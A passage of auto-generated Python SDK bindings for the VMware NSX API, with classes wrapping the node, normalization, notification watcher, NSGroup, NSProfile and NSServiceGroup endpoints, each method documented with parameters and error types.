:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'template_id': template_id,
'network_migration_spec': network_migration_spec,
})
class Node(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.node'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _NodeStub)
self._VAPI_OPERATION_IDS = {}
def get(self):
"""
Returns information about the NSX appliance. Information includes
release number, time zone, system time, kernel version, message of the
day (motd), and host name.
:rtype: :class:`com.vmware.nsx.model_client.NodeProperties`
:return: com.vmware.nsx.model.NodeProperties
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get', None)
def restart(self):
"""
Restarts or shuts down the NSX appliance.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('restart', None)
def setsystemtime(self,
node_time,
):
"""
Set the node system time to the given time in UTC in the RFC3339 format
'yyyy-mm-ddThh:mm:ssZ'.
:type node_time: :class:`com.vmware.nsx.model_client.NodeTime`
:param node_time: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.ConcurrentChange`
Conflict
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('setsystemtime',
{
'node_time': node_time,
})
def shutdown(self):
"""
Restarts or shuts down the NSX appliance.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('shutdown', None)
def update(self,
node_properties,
):
"""
Modifies NSX appliance properties. Modifiable properties include the
timezone, message of the day (motd), and hostname. The NSX appliance
node_version, system_time, and kernel_version are read only and cannot
be modified with this method.
:type node_properties: :class:`com.vmware.nsx.model_client.NodeProperties`
:param node_properties: (required)
:rtype: :class:`com.vmware.nsx.model_client.NodeProperties`
:return: com.vmware.nsx.model.NodeProperties
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'node_properties': node_properties,
})
class Normalizations(VapiInterface):
"""
"""
LIST_PREFERRED_NORMALIZATION_TYPE_NSGROUP = "NSGroup"
"""
Possible value for ``preferredNormalizationType`` of method
:func:`Normalizations.list`.
"""
LIST_PREFERRED_NORMALIZATION_TYPE_IPSET = "IPSet"
"""
Possible value for ``preferredNormalizationType`` of method
:func:`Normalizations.list`.
"""
LIST_PREFERRED_NORMALIZATION_TYPE_MACSET = "MACSet"
"""
Possible value for ``preferredNormalizationType`` of method
:func:`Normalizations.list`.
"""
LIST_PREFERRED_NORMALIZATION_TYPE_LOGICALSWITCH = "LogicalSwitch"
"""
Possible value for ``preferredNormalizationType`` of method
:func:`Normalizations.list`.
"""
LIST_PREFERRED_NORMALIZATION_TYPE_LOGICALPORT = "LogicalPort"
"""
Possible value for ``preferredNormalizationType`` of method
:func:`Normalizations.list`.
"""
LIST_PREFERRED_NORMALIZATION_TYPE_DIRECTORYGROUP = "DirectoryGroup"
"""
Possible value for ``preferredNormalizationType`` of method
:func:`Normalizations.list`.
"""
LIST_RESOURCE_TYPE_NSGROUP = "NSGroup"
"""
Possible value for ``resourceType`` of method :func:`Normalizations.list`.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.normalizations'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _NormalizationsStub)
self._VAPI_OPERATION_IDS = {}
def list(self,
preferred_normalization_type,
resource_id,
resource_type,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns the list of normalized resources based on the query parameters.
Id and Type of the resource on which the normalizations is to be
performed, are to be specified as query parameters in the URI. The
target resource types to which normalization is to be done should also
be specified as query parameter.
:type preferred_normalization_type: :class:`str`
:param preferred_normalization_type: Resource type valid for use as target in normalization API.
(required)
:type resource_id: :class:`str`
:param resource_id: Identifier of the resource on which normalization is to be
performed (required)
:type resource_type: :class:`str`
:param resource_type: Resource type valid for use as source in normalization API.
(required)
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.NormalizedResourceListResult`
:return: com.vmware.nsx.model.NormalizedResourceListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'preferred_normalization_type': preferred_normalization_type,
'resource_id': resource_id,
'resource_type': resource_type,
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
class NotificationWatchers(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.notification_watchers'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _NotificationWatchersStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
notification_watcher,
):
"""
Add a new notification watcher.
:type notification_watcher: :class:`com.vmware.nsx.model_client.NotificationWatcher`
:param notification_watcher: (required)
:rtype: :class:`com.vmware.nsx.model_client.NotificationWatcher`
:return: com.vmware.nsx.model.NotificationWatcher
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'notification_watcher': notification_watcher,
})
def delete(self,
watcher_id,
):
"""
Delete notification watcher.
:type watcher_id: :class:`str`
:param watcher_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'watcher_id': watcher_id,
})
def get(self,
watcher_id,
):
"""
Returns notification watcher by watcher id.
:type watcher_id: :class:`str`
:param watcher_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.NotificationWatcher`
:return: com.vmware.nsx.model.NotificationWatcher
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'watcher_id': watcher_id,
})
def list(self):
"""
Returns a list of registered notification watchers.
:rtype: :class:`com.vmware.nsx.model_client.NotificationWatcherListResult`
:return: com.vmware.nsx.model.NotificationWatcherListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list', None)
def update(self,
watcher_id,
notification_watcher,
):
"""
Update notification watcher.
:type watcher_id: :class:`str`
:param watcher_id: (required)
:type notification_watcher: :class:`com.vmware.nsx.model_client.NotificationWatcher`
:param notification_watcher: (required)
:rtype: :class:`com.vmware.nsx.model_client.NotificationWatcher`
:return: com.vmware.nsx.model.NotificationWatcher
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'watcher_id': watcher_id,
'notification_watcher': notification_watcher,
})
class NsGroups(VapiInterface):
"""
"""
ADDORREMOVEEXPRESSION_ACTION_ADD_MEMBERS = "ADD_MEMBERS"
"""
Possible value for ``action`` of method :func:`NsGroups.addorremoveexpression`.
"""
ADDORREMOVEEXPRESSION_ACTION_REMOVE_MEMBERS = "REMOVE_MEMBERS"
"""
Possible value for ``action`` of method :func:`NsGroups.addorremoveexpression`.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.ns_groups'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _NsGroupsStub)
self._VAPI_OPERATION_IDS = {}
def addorremoveexpression(self,
ns_group_id,
ns_group_expression_list,
action,
):
"""
Add/remove the expressions passed in the request body to/from the
NSGroup
:type ns_group_id: :class:`str`
:param ns_group_id: NSGroup Id (required)
:type ns_group_expression_list: :class:`com.vmware.nsx.model_client.NSGroupExpressionList`
:param ns_group_expression_list: (required)
:type action: :class:`str`
:param action: Specifies addition or removal action (required)
:rtype: :class:`com.vmware.nsx.model_client.NSGroup`
:return: com.vmware.nsx.model.NSGroup
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('addorremoveexpression',
{
'ns_group_id': ns_group_id,
'ns_group_expression_list': ns_group_expression_list,
'action': action,
})
def create(self,
ns_group,
):
"""
Creates a new NSGroup that can group NSX resources - VIFs, Lports and
LSwitches as well as the grouping objects - IPSet, MACSet and other
NSGroups. For NSGroups containing VM criteria(both static and dynamic),
system VMs will not be included as members. This filter applies at VM
level only. Exceptions are as follows: 1. LogicalPorts and VNI of
System VMs will be included in NSGroup if the criteria is based on
LogicalPort, LogicalSwitch or VNI directly.
:type ns_group: :class:`com.vmware.nsx.model_client.NSGroup`
:param ns_group: (required)
:rtype: :class:`com.vmware.nsx.model_client.NSGroup`
:return: com.vmware.nsx.model.NSGroup
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'ns_group': ns_group,
})
def delete(self,
ns_group_id,
force=None,
):
"""
Deletes the specified NSGroup. By default, if the NSGroup is added to
another NSGroup, it won't be deleted. In such situations, pass
\"force=true\" as query param to force delete the NSGroup.
:type ns_group_id: :class:`str`
:param ns_group_id: NSGroup Id (required)
:type force: :class:`bool` or ``None``
:param force: Force delete the resource even if it is being used somewhere
(optional, default to false)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'ns_group_id': ns_group_id,
'force': force,
})
def get(self,
ns_group_id,
populate_references=None,
):
"""
Returns information about the specified NSGroup.
:type ns_group_id: :class:`str`
:param ns_group_id: NSGroup Id (required)
:type populate_references: :class:`bool` or ``None``
:param populate_references: Populate metadata of resource referenced by NSGroupExpressions
(optional, default to false)
:rtype: :class:`com.vmware.nsx.model_client.NSGroup`
:return: com.vmware.nsx.model.NSGroup
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'ns_group_id': ns_group_id,
'populate_references': populate_references,
})
def list(self,
cursor=None,
included_fields=None,
member_types=None,
page_size=None,
populate_references=None,
sort_ascending=None,
sort_by=None,
):
"""
List the NSGroups in a paginated format. The page size is restricted to
50 NSGroups so that the size of the response remains small even in the
worst case. Optionally, specify valid member types as request parameter
to filter NSGroups.
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type member_types: :class:`str` or ``None``
:param member_types: Specify member types to filter corresponding NSGroups (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type populate_references: :class:`bool` or ``None``
:param populate_references: Populate metadata of resource referenced by NSGroupExpressions
(optional, default to false)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.NSGroupListResult`
:return: com.vmware.nsx.model.NSGroupListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'included_fields': included_fields,
'member_types': member_types,
'page_size': page_size,
'populate_references': populate_references,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def update(self,
ns_group_id,
ns_group,
):
"""
Updates the specified NSGroup. Modifiable parameters include the
description, display_name and members. For NSGroups containing VM
criteria(both static and dynamic), system VMs will not be included as
members. This filter applies at VM level only. Exceptions are as
follows. 1. LogicalPorts and VNI of system VMs will be included in
NSGroup if the criteria is based on LogicalPort, LogicalSwitch or VNI
directly.
:type ns_group_id: :class:`str`
:param ns_group_id: NSGroup Id (required)
:type ns_group: :class:`com.vmware.nsx.model_client.NSGroup`
:param ns_group: (required)
:rtype: :class:`com.vmware.nsx.model_client.NSGroup`
:return: com.vmware.nsx.model.NSGroup
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'ns_group_id': ns_group_id,
'ns_group': ns_group,
})
class NsProfiles(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.ns_profiles'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _NsProfilesStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
ns_profile,
):
"""
Creates a new NSProfile which allows users to encapsulate attribute and
sub-attributes of network services. Rules for using attributes and
sub-attributes in single NSProfile 1. One type of attribute can't have
multiple occurrences. ( Example - Attribute type APP_ID can be used
only once per NSProfile.) 2. Values for an attribute are mentioned as
array of strings. ( Example - For type APP_ID , values can be mentioned
as [\"SSL\",\"FTP\"].) 3. If sub-attribtes are mentioned for an
attribute, then only single value is allowed for that attribute. 4. To
get a list of supported attributes and sub-attributes fire the
following REST API GET https://<nsx-mgr>/api/v1/ns-profiles/attributes
:type ns_profile: :class:`com.vmware.nsx.model_client.NSProfile`
:param ns_profile: (required)
:rtype: :class:`com.vmware.nsx.model_client.NSProfile`
:return: com.vmware.nsx.model.NSProfile
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'ns_profile': ns_profile,
})
def delete(self,
ns_profile_id,
force=None,
):
"""
Deletes the specified NSProfile. By default, if the NSProfile is
consumed in a Firewall rule, it won't get deleted. In such situations,
pass \"force=true\" as query param to force delete the NSProfile.
:type ns_profile_id: :class:`str`
:param ns_profile_id: NSProfile Id (required)
:type force: :class:`bool` or ``None``
:param force: Force delete the resource even if it is being used somewhere
(optional, default to false)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'ns_profile_id': ns_profile_id,
'force': force,
})
def get(self,
ns_profile_id,
):
"""
Returns information about the specified NSProfile.
:type ns_profile_id: :class:`str`
:param ns_profile_id: NSProfile Id (required)
:rtype: :class:`com.vmware.nsx.model_client.NSProfile`
:return: com.vmware.nsx.model.NSProfile
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'ns_profile_id': ns_profile_id,
})
def list(self,
attribute_type=None,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
List the NSProfiles created in a paginated format.The page size is
restricted to 50 NSProfiles, so that the size of the response remains
small even when there are high number of NSProfiles with multiple
attributes and multiple attribute values for each attribute.
:type attribute_type: :class:`str` or ``None``
:param attribute_type: Fetch NSProfiles for the given attribute type (optional)
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.NSProfileListResult`
:return: com.vmware.nsx.model.NSProfileListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'attribute_type': attribute_type,
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def update(self,
ns_profile_id,
ns_profile,
):
"""
Updates the specified NSProfile. Rules for using attributes and
sub-attributes in single NSProfile 1. One type of attribute can't have
multiple occurrences. ( Example - Attribute type APP_ID can be used
only once per NSProfile.) 2. Values for an attribute are mentioned as
array of strings. ( Example - For type APP_ID , values can be mentioned
as [\"SSL\",\"FTP\"].) 3. If sub-attribtes are mentioned for an
attribute, then only single value is allowed for that attribute. 4. To
get a list of supported attributes and sub-attributes fire the
following REST API GET https://<nsx-mgr>/api/v1/ns-profiles/attributes
:type ns_profile_id: :class:`str`
:param ns_profile_id: NSProfile Id (required)
:type ns_profile: :class:`com.vmware.nsx.model_client.NSProfile`
:param ns_profile: (required)
:rtype: :class:`com.vmware.nsx.model_client.NSProfile`
:return: com.vmware.nsx.model.NSProfile
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'ns_profile_id': ns_profile_id,
'ns_profile': ns_profile,
})
class NsServiceGroups(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.ns_service_groups'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _NsServiceGroupsStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
ns_service_group,
):
"""
Creates a new NSServiceGroup which can contain NSServices. A given
NSServiceGroup can contain either only ether type of NSServices or only
non-ether type of NSServices, i.e. an NSServiceGroup cannot contain a
mix of both ether and non-ether types of NSServices.
:type ns_service_group: :class:`com.vmware.nsx.model_client.NSServiceGroup`
:param ns_service_group: (required)
:rtype: :class:`com.vmware.nsx.model_client.NSServiceGroup`
:return: com.vmware.nsx.model.NSServiceGroup
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'ns_service_group': ns_service_group,
})
def delete(self,
ns_service_group_id,
force=None,
):
"""
Deletes the specified NSServiceGroup. By default, if the NSServiceGroup
is consumed in a Firewall rule, it won't get deleted. In such
situations, pass \"force=true\" as query param to force delete the
NSServiceGroup.
:type ns_service_group_id: :class:`str`
:param ns_service_group_id: NSServiceGroup Id (required)
:type force: :class:`bool` or ``None``
:param force: Force delete the resource even if it is being used somewhere
(optional, default to false)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.ConcurrentChange`
Conflict
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'ns_service_group_id': ns_service_group_id,
'force': force,
})
def get(self,
ns_service_group_id,
):
"""
Returns information about the specified NSServiceGroup
:type ns_service_group_id: :class:`str`
:param ns_service_group_id: NSServiceGroup Id (required)
:rtype: :class:`com.vmware.nsx.model_client.NSServiceGroup`
:return: com.vmware.nsx.model.NSServiceGroup
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'ns_service_group_id': ns_service_group_id,
})
def list(self,
cursor=None,
default_service=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns paginated list of NSServiceGroups
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type default_service: :class:`bool` or ``None``
:param default_service: Fetch all default NSServiceGroups (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.NSServiceGroupListResult`
:return: com.vmware.nsx.model.NSServiceGroupListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'default_service': default_service,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def update(self,
ns_service_group_id,
ns_service_group,
):
"""
Updates the specified NSService. Modifiable parameters include the
description, display_name and members.
:type ns_service_group_id: :class:`str`
:param ns_service_group_id: NSServiceGroup Id (required)
:type ns_service_group: :class:`com.vmware.nsx.model_client.NSServiceGroup`
:param ns_service_group: (required)
:rtype: :class:`com.vmware.nsx.model_client.NSServiceGroup`
:return: com.vmware.nsx.model.NSServiceGroup
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
